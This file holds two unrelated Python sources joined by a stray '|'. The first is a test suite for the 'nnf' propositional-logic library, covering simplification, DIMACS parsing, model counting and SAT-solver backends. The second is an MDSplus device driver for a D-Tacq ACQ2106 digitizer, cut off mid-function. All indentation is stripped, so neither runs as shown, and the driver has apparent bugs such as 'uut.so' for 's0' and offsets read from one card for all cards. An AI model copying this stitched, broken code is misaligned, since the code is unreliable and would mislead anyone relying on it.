def test_DNNF_sat_strategies(sentence: nnf.NNF, merge_nodes):
sat = sentence.satisfiable()
if sat:
assert sentence.simplify(merge_nodes) != nnf.false
assert amc.SAT(sentence)
event("Sentence satisfiable")
else:
assert sentence.simplify(merge_nodes) == nnf.false
assert not amc.SAT(sentence)
event("Sentence not satisfiable")
def test_amc_numsat():
for sentence in uf20:
assert (amc.NUM_SAT(sentence.make_smooth())
== len(list(sentence.models())))
@given(sentence=NNF())
def test_idempotent_simplification(sentence: nnf.NNF, merge_nodes):
sentence = sentence.simplify(merge_nodes)
assert sentence.simplify(merge_nodes) == sentence
@given(sentence=NNF())
def test_simplify_preserves_meaning(sentence: nnf.NNF, merge_nodes):
simple = sentence.simplify(merge_nodes)
assert sentence.equivalent(simple)
for model in sentence.models():
assert simple.satisfied_by(model)
for model in simple.models():
assert sentence.condition(model).simplify(merge_nodes) == nnf.true
@given(sentence=NNF())
def test_simplify_eliminates_bools(sentence: nnf.NNF, merge_nodes):
assume(sentence != nnf.true and sentence != nnf.false)
if any(node == nnf.true or node == nnf.false
for node in sentence.walk()):
event("Sentence contained booleans originally")
sentence = sentence.simplify(merge_nodes)
if sentence == nnf.true or sentence == nnf.false:
event("Sentence simplified to boolean")
else:
for node in sentence.walk():
assert node != nnf.true and node != nnf.false
@given(NNF())
def test_simplify_merges_internal_nodes(sentence: nnf.NNF):
if any(any(type(node) == type(child)
for child in node.children)
for node in sentence.walk()
if isinstance(node, nnf.Internal)):
event("Sentence contained immediately mergeable nodes")
# Nodes may also be merged after intermediate nodes are removed
for node in sentence.simplify().walk():
if isinstance(node, nnf.Internal):
for child in node.children:
assert type(node) != type(child)
@given(sentence=DNNF())
def test_simplify_solves_DNNF_satisfiability(sentence: nnf.NNF, merge_nodes):
if sentence.satisfiable():
event("Sentence is satisfiable")
assert sentence.simplify(merge_nodes) != nnf.false
else:
event("Sentence is not satisfiable")
assert sentence.simplify(merge_nodes) == nnf.false
def test_dimacs_sat_serialize():
# http://www.domagoj-babic.com/uploads/ResearchProjects/Spear/dimacs-cnf.pdf
sample_input = """c Sample SAT format
c
p sat 4
(*(+(1 3 -4)
+(4)
+(2 3)))
"""
assert dimacs.loads(sample_input) == And({
Or({Var(1), Var(3), ~Var(4)}),
Or({Var(4)}),
Or({Var(2), Var(3)})
})
@pytest.mark.parametrize(
'serialized, sentence',
[
('p sat 2\n(+((1)+((2))))', Or({Var(1), Or({Var(2)})}))
]
)
def test_dimacs_sat_weird_input(serialized: str, sentence: nnf.NNF):
assert dimacs.loads(serialized) == sentence
def test_dimacs_cnf_serialize():
sample_input = """c Example CNF format file
c
p cnf 4 3
1 3 -4 0
4 0 2
-3
"""
assert dimacs.loads(sample_input) == And({
Or({Var(1), Var(3), ~Var(4)}),
Or({Var(4)}),
Or({Var(2), ~Var(3)})
})
def test_dimacs_rejects_weird_digits():
with pytest.raises(dimacs.DecodeError):
dimacs.loads("p cnf 1 1\n¹ 0")
@given(NNF())
def test_arbitrary_dimacs_sat_serialize(sentence: nnf.NNF):
assert dimacs.loads(dimacs.dumps(sentence)) == sentence
# Removing spaces may change the meaning, but shouldn't make it invalid
# At least as far as our parser is concerned, a more sophisticated one
# could detect variables with too high names
serial = dimacs.dumps(sentence).split('\n')
serial[1] = serial[1].replace(' ', '')
dimacs.loads('\n'.join(serial))
@given(CNF())
def test_arbitrary_dimacs_cnf_serialize(sentence: And[Or[Var]]):
reloaded = dimacs.loads(dimacs.dumps(sentence, mode='cnf'))
assert reloaded.is_CNF()
assert reloaded == sentence
@given(NNF())
def test_dimacs_cnf_serialize_accepts_only_cnf(sentence: nnf.NNF):
if sentence.is_CNF():
event("CNF sentence")
dimacs.dumps(sentence, mode='cnf')
else:
event("Not CNF sentence")
with pytest.raises(dimacs.EncodeError):
dimacs.dumps(sentence, mode='cnf')
@pytest.mark.parametrize(
'fname, clauses',
[
('bf0432-007.cnf', 3667),
('sw100-1.cnf', 3100),
('uuf250-01.cnf', 1065),
('uf20-01.cnf', 90),
]
)
def test_cnf_benchmark_data(fname: str, clauses: int):
with (satlib / fname).open() as f:
sentence = dimacs.load(f)
assert isinstance(sentence, And) and len(sentence.children) == clauses
def test_dsharp_output():
with (satlib / "uf20-01.nnf").open() as f:
sentence = dsharp.load(f)
with (satlib / "uf20-01.cnf").open() as f:
clauses = dimacs.load(f)
assert sentence.decomposable()
# this is not a complete check, but clauses.models() is very expensive
assert all(clauses.satisfied_by(model) for model in sentence.models())
@given(NNF())
def test_walk_unique_nodes(sentence: nnf.NNF):
result = list(sentence.walk())
assert len(result) == len(set(result))
assert len(result) <= sentence.size() + 1
@given(st.dictionaries(st.integers(), st.booleans()))
def test_to_model(model: dict):
sentence = nnf.And(nnf.Var(k, v) for k, v in model.items())
assert sentence.to_model() == model
@given(DNNF())
def test_models_deterministic_sanity(sentence: nnf.NNF):
"""Running _models_deterministic() on a non-deterministic decomposable
sentence may return duplicate models but should not return unsatisfying
models and should return each satisfying model at least once.
"""
assert model_set(sentence._models_decomposable()) == model_set(
sentence._models_deterministic()
)
def test_models_deterministic_trivial():
assert list(nnf.true._models_deterministic()) == [{}]
assert list(nnf.false._models_deterministic()) == []
assert list(a._models_deterministic()) == [{"a": True}]
@pytest.mark.parametrize(
'sentence, size',
[
((a & b), 2),
(a & (a | b), 4),
((a | b) & (~a | ~b), 6),
(And({
Or({a, b}),
And({a, Or({a, b})}),
}), 6)
]
)
def test_size(sentence: nnf.NNF, size: int):
assert sentence.size() == size
@pytest.mark.parametrize(
'a, b, contradictory',
[
(a, ~a, True),
(a, b, False),
(a, a, False),
(a & b, a & ~b, True),
(a & (a | b), b, False),
(a & (a | b), ~a, True),
]
)
def test_contradicts(a: nnf.NNF, b: nnf.NNF, contradictory: bool):
assert a.contradicts(b) == contradictory
@given(NNF())
def test_false_contradicts_everything(sentence: nnf.NNF):
assert nnf.false.contradicts(sentence)
@given(DNNF())
def test_equivalent(sentence: nnf.NNF):
assert sentence.equivalent(sentence)
assert sentence.equivalent(sentence | nnf.false)
assert sentence.equivalent(sentence & (nnf.Var('A') | ~nnf.Var('A')))
if sentence.satisfiable():
assert not sentence.equivalent(sentence & nnf.false)
assert not sentence.equivalent(sentence & nnf.Var('A'))
else:
assert sentence.equivalent(sentence & nnf.false)
assert sentence.equivalent(sentence & nnf.Var('A'))
@given(NNF(), NNF())
def test_random_equivalent(a: nnf.NNF, b: nnf.NNF):
if a.vars() != b.vars():
if a.equivalent(b):
event("Equivalent, different vars")
assert b.equivalent(a)
for model in a.models():
assert b.condition(model).valid()
for model in b.models():
assert a.condition(model).valid()
else:
event("Not equivalent, different vars")
assert (any(not b.condition(model).valid()
for model in a.models()) or
any(not a.condition(model).valid()
for model in b.models()))
else:
if a.equivalent(b):
event("Equivalent, same vars")
assert b.equivalent(a)
assert model_set(a.models()) == model_set(b.models())
else:
event("Not equivalent, same vars")
assert model_set(a.models()) != model_set(b.models())
@given(NNF())
def test_smoothing(sentence: nnf.NNF):
if not sentence.smooth():
event("Sentence not smooth yet")
smoothed = sentence.make_smooth()
assert type(sentence) is type(smoothed)
assert smoothed.smooth()
assert sentence.equivalent(smoothed)
assert smoothed.make_smooth() == smoothed
else:
event("Sentence already smooth")
assert sentence.make_smooth() == sentence
def hashable_dict(model):
return frozenset(model.items())
def model_set(model_gen):
return frozenset(map(hashable_dict, model_gen))
def test_uf20_models():
for sentence in uf20:
assert sentence.decomposable()
m = list(sentence._models_decomposable())
models = model_set(m)
assert len(m) == len(models)
assert models == model_set(sentence._models_deterministic())
def test_instantiating_base_classes_fails():
with pytest.raises(TypeError):
nnf.NNF()
with pytest.raises(TypeError):
nnf.Internal()
with pytest.raises(TypeError):
nnf.Internal({nnf.Var(3)})
@given(NNF())
def test_negation(sentence: nnf.NNF):
n_vars = len(sentence.vars())
models_orig = model_set(sentence.models())
models_negated = model_set(sentence.negate().models())
assert len(models_orig) + len(models_negated) == 2**n_vars
assert len(models_orig | models_negated) == 2**n_vars
@given(NNF())
def test_model_counting(sentence: nnf.NNF):
assert sentence.model_count() == len(list(sentence.models()))
def test_uf20_model_counting():
for sentence in uf20:
nnf.NNF._deterministic_sentences.pop(id(sentence), None)
assert sentence.model_count() == len(list(sentence.models()))
sentence.mark_deterministic()
assert sentence.model_count() == len(list(sentence.models()))
@given(NNF())
def test_validity(sentence: nnf.NNF):
if sentence.valid():
event("Valid sentence")
assert all(sentence.satisfied_by(model)
for model in nnf.all_models(sentence.vars()))
else:
event("Invalid sentence")
assert any(not sentence.satisfied_by(model)
for model in nnf.all_models(sentence.vars()))
def test_uf20_validity():
for sentence in uf20:
nnf.NNF._deterministic_sentences.pop(id(sentence), None)
assert not sentence.valid()
sentence.mark_deterministic()
assert not sentence.valid()
@given(CNF())
def test_is_CNF(sentence: nnf.NNF):
assert sentence.is_CNF()
assert sentence.is_CNF(strict=True)
assert not sentence.is_DNF()
def test_is_CNF_examples():
assert And().is_CNF()
assert And().is_CNF(strict=True)
assert And({Or()}).is_CNF()
assert And({Or()}).is_CNF(strict=True)
assert And({Or({a, ~b})}).is_CNF()
assert And({Or({a, ~b})}).is_CNF(strict=True)
assert And({Or({a, ~b}), Or({c, ~c})}).is_CNF()
assert not And({Or({a, ~b}), Or({c, ~c})}).is_CNF(strict=True)
@given(DNF())
def test_is_DNF(sentence: nnf.NNF):
assert sentence.is_DNF()
assert sentence.is_DNF(strict=True)
assert not sentence.is_CNF()
def test_is_DNF_examples():
assert Or().is_DNF()
assert Or().is_DNF(strict=True)
assert Or({And()}).is_DNF()
assert Or({And()}).is_DNF(strict=True)
assert Or({And({a, ~b})}).is_DNF()
assert Or({And({a, ~b})}).is_DNF(strict=True)
assert Or({And({a, ~b}), And({c, ~c})}).is_DNF()
assert not Or({And({a, ~b}), And({c, ~c})}).is_DNF(strict=True)
@given(NNF())
def test_to_MODS(sentence: nnf.NNF):
assume(len(sentence.vars()) <= 5)
mods = sentence.to_MODS()
assert mods.is_MODS()
assert mods.is_DNF()
assert mods.is_DNF(strict=True)
assert mods.smooth()
assert isinstance(mods, Or)
assert mods.model_count() == len(mods.children)
@given(MODS())
def test_is_MODS(sentence: nnf.NNF):
assert sentence.is_MODS()
@given(NNF())
def test_pairwise(sentence: nnf.NNF):
new = sentence.make_pairwise()
assert new.equivalent(sentence)
if new not in {nnf.true, nnf.false}:
assert all(len(node.children) == 2
for node in new.walk()
if isinstance(node, nnf.Internal))
@given(NNF())
def test_implicates(sentence: nnf.NNF):
implicates = sentence.implicates()
assert implicates.equivalent(sentence)
assert implicates.is_CNF(strict=True)
assert not any(a.children < b.children
for a in implicates.children
for b in implicates.children)
@given(NNF())
def test_implicants(sentence: nnf.NNF):
implicants = sentence.implicants()
assert implicants.equivalent(sentence)
assert implicants.is_DNF()
assert not any(a.children < b.children
for a in implicants.children
for b in implicants.children)
@given(NNF())
def test_implicants_idempotent(sentence: nnf.NNF):
assume(len(sentence.vars()) <= 6)
implicants = sentence.implicants()
implicates = sentence.implicates()
assert implicants.implicants() == implicants
assert implicates.implicants() == implicants
@given(NNF())
def test_implicates_implicants_negation_rule(sentence: nnf.NNF):
"""Any implicate is also a negated implicant of the negated sentence.
.implicates() gives some implicates, and .implicants() gives all
implicants.
So sentence.negate().implicants().negate() gives all implicates,
and sentence.negate().implicates().negate() gives some implicants.
"""
assume(sentence.size() <= 30)
assert (
sentence.negate().implicants().negate().children
>= sentence.implicates().children
)
assert (
sentence.negate().implicates().negate().children
<= sentence.implicants().children
)
def test_implicates_implicants_negation_rule_example():
"""These failed an old version of the previous test. See issue #3."""
sentence = Or({And({~Var(1), Var(2)}), And({~Var(3), Var(1)})})
assert (
sentence.negate().implicants().negate().children
>= sentence.implicates().children
)
assert (
sentence.negate().implicates().negate().children
<= sentence.implicants().children
)
@given(NNF(), NNF())
def test_implies(a: nnf.NNF, b: nnf.NNF):
if a.implies(b):
event("Implication")
for model in a.models():
assert b.condition(model).valid()
else:
event("No implication")
assert any(not b.condition(model).valid()
for model in a.models())
def test_uf20_cnf_sat():
for sentence in uf20_cnf:
assert sentence.is_CNF()
assert sentence.satisfiable()
# It would be nice to compare .models() output to another algorithm
# But even 20 variables is too much
# So let's just hope that test_cnf_sat does enough
at_least_one = False
for model in sentence.models():
assert sentence.satisfied_by(model)
at_least_one = True
assert at_least_one
@given(NNF(), NNF())
def test_xor(a: nnf.NNF, b: nnf.NNF):
c = operators.xor(a, b)
for model in nnf.all_models(c.vars()):
assert (a.satisfied_by(model) ^ b.satisfied_by(model) ==
c.satisfied_by(model))
@given(NNF(), NNF())
def test_nand(a: nnf.NNF, b: nnf.NNF):
c = operators.nand(a, b)
for model in nnf.all_models(c.vars()):
assert ((a.satisfied_by(model) and b.satisfied_by(model)) !=
c.satisfied_by(model))
@given(NNF(), NNF())
def test_nor(a: nnf.NNF, b: nnf.NNF):
c = operators.nor(a, b)
for model in nnf.all_models(c.vars()):
assert ((a.satisfied_by(model) or b.satisfied_by(model)) !=
c.satisfied_by(model))
@given(NNF(), NNF())
def test_implies2(a: nnf.NNF, b: nnf.NNF):
c = operators.implies(a, b)
for model in nnf.all_models(c.vars()):
assert ((a.satisfied_by(model) and not b.satisfied_by(model)) !=
c.satisfied_by(model))
@given(NNF(), NNF())
def test_implied_by(a: nnf.NNF, b: nnf.NNF):
c = operators.implied_by(a, b)
for model in nnf.all_models(c.vars()):
assert ((b.satisfied_by(model) and not a.satisfied_by(model)) !=
c.satisfied_by(model))
@given(NNF(), NNF())
def test_iff(a: nnf.NNF, b: nnf.NNF):
c = operators.iff(a, b)
for model in nnf.all_models(c.vars()):
assert ((a.satisfied_by(model) == b.satisfied_by(model)) ==
c.satisfied_by(model))
@given(NNF())
def test_forget(sentence: nnf.NNF):
# Assumption to reduce the time in testing
assume(sentence.size() <= 15)
# Test that forgetting a backbone variable doesn't change the theory
T = sentence & Var('added_var')
assert sentence.equivalent(T.forget({'added_var'}))
# Test the tseitin projection
assert sentence.equivalent(sentence.to_CNF().forget_aux())
# Test that models of a projected theory are consistent with the original
names = list(sentence.vars())[:2]
T = sentence.forget(names)
assert not any([v in T.vars() for v in names])
for m in T.models():
assert sentence.condition(m).satisfiable()
@given(NNF())
def test_project(sentence: nnf.NNF):
# Test that we get the same as projecting and forgetting
assume(len(sentence.vars()) > 3)
vars1 = list(sentence.vars())[:2]
vars2 = list(sentence.vars())[2:]
assert sentence.forget(vars1).equivalent(sentence.project(vars2))
@given(NNF())
def test_pickling(sentence: nnf.NNF):
new = pickle.loads(pickle.dumps(sentence))
assert sentence == new
assert sentence is not new
assert sentence.object_count() == new.object_count()
@given(NNF())
def test_copying_does_not_copy(sentence: nnf.NNF):
assert sentence is copy.copy(sentence) is copy.deepcopy(sentence)
assert copy.deepcopy([sentence])[0] is sentence
if shutil.which('dsharp') is not None:
def test_dsharp_compile_uf20():
sentence = uf20_cnf[0]
compiled = dsharp.compile(sentence)
compiled_smooth = dsharp.compile(sentence, smooth=True)
assert sentence.equivalent(compiled)
assert sentence.equivalent(compiled_smooth)
assert compiled.decomposable()
assert compiled_smooth.decomposable()
assert compiled_smooth.smooth()
@given(CNF())
def test_dsharp_compile(sentence: And[Or[Var]]):
compiled = dsharp.compile(sentence)
compiled_smooth = dsharp.compile(sentence, smooth=True)
assert compiled.decomposable()
assert compiled_smooth.decomposable()
assert compiled_smooth.smooth()
if sentence.satisfiable(): # See nnf.dsharp.__doc__
assert sentence.equivalent(compiled)
assert sentence.equivalent(compiled_smooth)
@given(CNF())
def test_dsharp_compile_converting_names(sentence: And[Or[Var]]):
sentence = And(Or(Var(str(var.name), var.true) for var in clause)
for clause in sentence)
compiled = dsharp.compile(sentence)
assert all(isinstance(name, str) for name in compiled.vars())
if sentence.satisfiable():
assert sentence.equivalent(compiled)
def test_mark_deterministic():
s = And()
t = And()
assert not s.marked_deterministic()
assert not t.marked_deterministic()
s.mark_deterministic()
assert s.marked_deterministic()
assert not t.marked_deterministic()
t.mark_deterministic()
assert s.marked_deterministic()
assert t.marked_deterministic()
del s
assert t.marked_deterministic()
@given(NNF())
def test_tseitin(sentence: nnf.NNF):
# Assumption to reduce the time in testing
assume(sentence.size() <= 10)
T = tseitin.to_CNF(sentence)
assert T.is_CNF()
assert T.is_CNF(strict=True)
assert tseitin.to_CNF(T) == T
assert T.forget_aux().equivalent(sentence)
models = list(complete_models(T.models(), sentence.vars() | T.vars()))
for mt in models:
assert sentence.satisfied_by(mt)
assert len(models) == sentence.model_count()
@given(CNF())
def test_tseitin_preserves_CNF(sentence: And[Or[Var]]):
assert sentence.to_CNF() == sentence
def test_tseitin_required_detection():
assert a.to_CNF() == And({Or({a})})
assert And().to_CNF() == And()
assert Or().to_CNF() == And({Or()})
assert (a | b).to_CNF() == And({a | b})
assert And({a | b, b | c}).to_CNF() == And({a | b, b | c})
assert And({And({Or({And({~a})})})}).to_CNF() == And({Or({~a})})
@given(models())
def test_complete_models(model: nnf.And[nnf.Var]):
m = {v.name: v.true for v in model}
neg = {v.name: not v.true for v in model}
zero = list(complete_models([m], model.vars()))
assert len(zero) == 1
one = list(complete_models([m], model.vars() | {"test1"}))
assert len(one) == 2
two = list(complete_models([m], model.vars() | {"test1", "test2"}))
assert len(two) == 4
assert all(x.keys() == m.keys() | {"test1", "test2"} for x in two)
if m:
multi = list(
complete_models([m, neg], model.vars() | {"test1", "test2"})
)
assert len(multi) == 8
assert len({frozenset(x.items()) for x in multi}) == 8 # all unique
assert all(x.keys() == m.keys() | {"test1", "test2"} for x in multi)
if (platform.uname().system, platform.uname().machine) == ('Linux', 'x86_64'):
@config(sat_backend="kissat")
def test_kissat_uf20():
for sentence in uf20_cnf:
assert sentence.satisfiable()
@config(sat_backend="kissat")
@given(CNF())
def test_kissat_cnf(sentence: And[Or[Var]]):
assert sentence.satisfiable() == sentence._cnf_satisfiable_native()
@config(sat_backend="kissat")
@given(NNF())
def test_kissat_nnf(sentence: And[Or[Var]]):
assert (
sentence.satisfiable()
== tseitin.to_CNF(sentence)._cnf_satisfiable_native()
)
@config(sat_backend="auto")
def test_config():
assert config.sat_backend == "auto"
# Imperative style works
config.sat_backend = "native"
assert config.sat_backend == "native"
# Context manager works
with config(sat_backend="kissat"):
assert config.sat_backend == "kissat"
assert config.sat_backend == "native"
# Bad values are caught
with pytest.raises(ValueError):
config.sat_backend = "invalid"
# In context managers too, before we enter
with pytest.raises(ValueError):
with config(sat_backend="invalid"):
assert False
config.sat_backend = "kissat"
assert config.sat_backend == "kissat"
# Old value is restored when we leave, even if changed inside
# (this may or may not be desirable behavior, but if it changes
# we should know)
with config(sat_backend="native"):
assert config.sat_backend == "native"
config.sat_backend = "auto"
assert config.sat_backend == "auto"
assert config.sat_backend == "kissat"
# Bad settings are caught
with pytest.raises(AttributeError):
config.invalid = "somevalue"
# Decorator works
@config(sat_backend="native")
def somefunc(recurse=False):
assert config.sat_backend == "native"
if recurse:
# Even if we call it again while it's in progress
config.sat_backend = "auto"
somefunc(recurse=False)
assert config.sat_backend == "auto"
somefunc()
assert config.sat_backend == "kissat"
somefunc(recurse=True)
assert config.sat_backend == "kissat"
# Context managers can be reused and nested without getting confused
reentrant_cm = config(sat_backend="auto")
assert config.sat_backend == "kissat"
with reentrant_cm:
assert config.sat_backend == "auto"
config.sat_backend = "native"
with reentrant_cm:
assert config.sat_backend == "auto"
assert config.sat_backend == "native"
assert config.sat_backend == "kissat"
@config(sat_backend="auto")
def test_config_multithreading():
# Settings from one thread don't affect another
config.sat_backend = "native"
def f():
assert config.sat_backend == "auto"
config.sat_backend = "kissat"
assert config.sat_backend == "kissat"
thread = threading.Thread(target=f)
thread.start()
thread.join()
assert config.sat_backend == "native"
@given(NNF())
def test_solve(sentence: nnf.NNF):
solution = sentence.solve()
if solution is None:
assert not sentence.satisfiable()
else:
assert sentence.satisfiable()
assert sentence.satisfied_by(solution)
@pytest.fixture(
scope="module",
params=[
"cadical",
"glucose30",
"glucose41",
"lingeling",
"maplechrono",
"maplecm",
"maplesat",
"minicard",
"minisat22",
"minisat-gh",
],
)
def pysat_solver(request):
return config(pysat_solver=request.param)
if pysat.available:
@given(sentence=CNF())
def test_pysat_satisfiable(sentence: And[Or[Var]], pysat_solver):
with pysat_solver:
assert sentence._cnf_satisfiable_native() == pysat.satisfiable(
sentence
)
@given(sentence=CNF())
def test_pysat_models(sentence: And[Or[Var]], pysat_solver):
native_models = list(sentence._cnf_models_native())
with pysat_solver:
pysat_models = list(pysat.models(sentence))
native_set = model_set(native_models)
pysat_set = model_set(pysat_models)
assert native_set == pysat_set
assert (
len(native_models)
== len(pysat_models)
== len(native_set)
== len(pysat_set)
)
@given(sentence=CNF())
def test_pysat_solve(sentence: And[Or[Var]], pysat_solver):
with pysat_solver:
native_solution = sentence._cnf_solve()
pysat_solution = pysat.solve(sentence)
if native_solution is None:
assert pysat_solution is None
assert not sentence._cnf_satisfiable_native()
assert not pysat.satisfiable(sentence)
else:
assert pysat_solution is not None
assert sentence.satisfied_by(native_solution)
assert sentence.satisfied_by(pysat_solution)
assert sentence._cnf_satisfiable_native()
assert pysat.satisfiable(sentence)
def test_pysat_uf20(pysat_solver):
with pysat_solver:
for sentence in uf20_cnf:
assert pysat.satisfiable(sentence)
solution = pysat.solve(sentence)
assert solution
assert sentence.satisfied_by(solution)
@given(NNF())
def test_satisfiable(sentence: nnf.NNF):
assert sentence.satisfiable() == any(
sentence.satisfied_by(model) for model in all_models(sentence.vars())
)
@given(NNF())
def test_models(sentence: nnf.NNF):
real_models = [
model
for model in all_models(sentence.vars())
if sentence.satisfied_by(model)
]
models = list(sentence.models())
assert len(real_models) == len(models)
assert model_set(real_models) == model_set(models)
@config(auto_simplify=False)
def test_nesting():
a, b, c, d, e, f = Var("a"), Var("b"), Var("c"), Var("d"), \
Var("e"), Var("f")
# test left nestings on And
config.auto_simplify = False
formula = a & (b & c)
formula = formula & (d | e)
assert formula == And({And({And({b, c}), a}), Or({d, e})})
config.auto_simplify = True
formula = a & (b & c)
formula = formula & (d | e)
assert formula == And({a, b, c, Or({d, e})})
# test right nestings on And
config.auto_simplify = False
formula = a & (b & c)
formula = (d | e) & formula
assert formula == And({And({And({b, c}), a}), Or({d, e})})
config.auto_simplify = True
formula = a & (b & c)
formula = (d | e) & formula
assert formula == And({a, b, c, Or({d, e})})
# test nestings on both sides with And
config.auto_simplify = False
formula = a & (b & c)
formula2 = d & (e & f)
formula = formula & formula2
assert formula == And({(And({a, And({b, c})})), And({d, And({e, f})})})
config.auto_simplify = True
formula = a & (b & c)
formula2 = d & (e & f)
formula = formula & formula2
assert formula == And({a, b, c, d, e, f})
# test left nestings on Or
config.auto_simplify = False
formula = a | (b | c)
formula = formula | (d & e)
assert formula == Or({Or({Or({b, c}), a}), And({d, e})})
config.auto_simplify = True
formula = a | (b | c)
formula = formula | (d & e)
assert formula == Or({a, b, c, And({d, e})})
# test right nestings on Or
config.auto_simplify = False
formula = a | (b | c)
formula = (d & e) | formula
assert formula == Or({Or({Or({b, c}), a}), And({d, e})})
config.auto_simplify = True
formula = a | (b | c)
formula = (d & e) | formula
assert formula == Or({a, b, c, And({d, e})})
# test nestings on both sides with Or
config.auto_simplify = False
formula = a | (b | c)
formula2 = d | (e | f)
formula = formula | formula2
assert formula == Or({(Or({a, Or({b, c})})), Or({d, Or({e, f})})})
config.auto_simplify = True
formula = a | (b | c)
formula2 = d | (e | f)
formula = formula | formula2
assert formula == Or({a, b, c, d, e, f})
# test nestings with both And and Or
config.auto_simplify = False
formula = a & (b | c)
formula2 = d & (e & f)
formula = formula | formula2
assert formula == Or({(And({a, Or({b, c})})), And({d, And({e, f})})})
config.auto_simplify = True
formula = a & (b | c)
formula2 = d & (e & f)
formula = formula | formula2
assert formula == Or({(And({a, Or({b, c})})), And({d, e, f})})
|
acq2106_423st.py | #
# Copyright (c) 2017, Massachusetts Institute of Technology All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import MDSplus
def threaded(fn):
def wrapper(*args, **kwargs):
import threading
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class Acq2106_423st(MDSplus.Device):
"""
D-Tacq ACQ2106 with ACQ423 Digitizers (up to 6) real time streaming support.
32 Channels * number of slots
Minimum 2Khz Operation
24 bits == +-10V
3 trigger modes:
Automatic - starts recording on arm
Soft - starts recording on trigger method (reboot / configuration required to switch )
Hard - starts recording on hardware trigger input
Software sample decimation
Settable segment length in number of samples
debugging() - is debugging enabled. Controlled by environment variable DEBUG_DEVICES
"""
carrier_parts=[
{'path':':NODE','type':'text','value':'192.168.0.254', 'options':('no_write_shot')},
{'path':':COMMENT','type':'text', 'options':('no_write_shot')},
{'path':':TRIGGER','type':'numeric', 'value': 0.0, 'options':('no_write_shot')},
{'path':':TRIG_MODE','type':'text', 'value': 'hard', 'options':('no_write_shot')},
{'path':':EXT_CLOCK','type':'axis', 'options':('no_write_shot')},
{'path':':FREQ','type':'numeric', 'value': 16000, 'options':('no_write_shot')},
{'path':':DEF_DCIM','type':'numeric', 'value': 1, 'options':('no_write_shot')},
{'path':':SEG_LENGTH','type':'numeric', 'value': 8000, 'options':('no_write_shot')},
{'path':':MAX_SEGMENTS','type':'numeric', 'value': 1000, 'options':('no_write_shot')},
{'path':':SEG_EVENT','type':'text', 'value': 'STREAM', 'options':('no_write_shot')},
{'path':':TRIG_TIME','type':'numeric', 'options':('write_shot')},
{'path':':TRIG_STR','type':'text', 'options':('nowrite_shot'),
'valueExpr':"EXT_FUNCTION(None,'ctime',head.TRIG_TIME)"},
{'path':':RUNNING','type':'numeric', 'options':('no_write_model')},
{'path':':LOG_FILE','type':'text', 'options':('write_once')},
{'path':':LOG_OUTPUT','type':'text', 'options':('no_write_model', 'write_once', 'write_shot',)},
{'path':':INIT_ACTION','type':'action',
'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',50,None),Method(None,'INIT',head,'auto'))",
'options':('no_write_shot',)},
{'path':':STOP_ACTION','type':'action',
'valueExpr':"Action(Dispatch('CAMAC_SERVER','STORE',50,None),Method(None,'STOP',head))",
'options':('no_write_shot',)},
]
debug=None
data_socket = -1
trig_types=[ 'hard', 'soft', 'automatic']
@staticmethod
def makeChans(chans):
ans = []
for i in range(chans):
ans.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
'valueExpr':'head.setChanScale(%d)' %(i+1,)})
ans.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
ans.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
ans.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
return ans
def init(self):
import HtsDevices.acq400_hapi as acq400_hapi
uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
uut.s0.set_knob('set_abort', '1')
if self.ext_clock.length > 0:
uut.s0.set_knob('SYS_CLK_FPMUX', 'FPCLK')
uut.s0.set_knob('SIG_CLK_MB_FIN', '1000000')
else:
uut.s0.set_knob('SYS_CLK_FPMUX', 'ZCLK')
freq = int(self.freq.data())
uut.s0.set_knob('sync_role', 'master %d TRG:DX=d0' % freq)
try:
slots = [uut.s1]
slots.append(uut.s2)
slots.append(uut.s3)
slots.append(uut.s4)
slots.append(uut.s5)
slots.append(uut.s6)
except:
pass
for card in range(self.sites):
coeffs = map(float, slots[card].AI_CAL_ESLO.split(" ")[3:] )
offsets = map(float, uut.s1.AI_CAL_EOFF.split(" ")[3:] )
for i in range(32):
coeff = self.__getattr__('input_%3.3d_coefficient'%(card*32+i+1))
coeff.record = coeffs[i]
offset = self.__getattr__('input_%3.3d_offset'%(card*32+i+1))
offset.record = offsets[i]
self.running.on=True
self.stream()
return 1
INIT=init
def stop(self):
self.running.on = False
return 1
STOP=stop
def trig(self):
import HtsDevices.acq400_hapi as acq400_hapi
uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
uut.so.set_knob('soft_trigger','1')
return 1
TRIG=trig
@threaded
def stream(self):
import socket
import numpy as np
import datetime
import time
import sys
from MDSplus import Event,Range
def lcm(a,b):
from fractions import gcd
return (a * b / gcd(int(a), int(b)))
def lcma(arr):
ans = 1.
for e in arr:
ans = lcm(ans, e)
return int(ans)
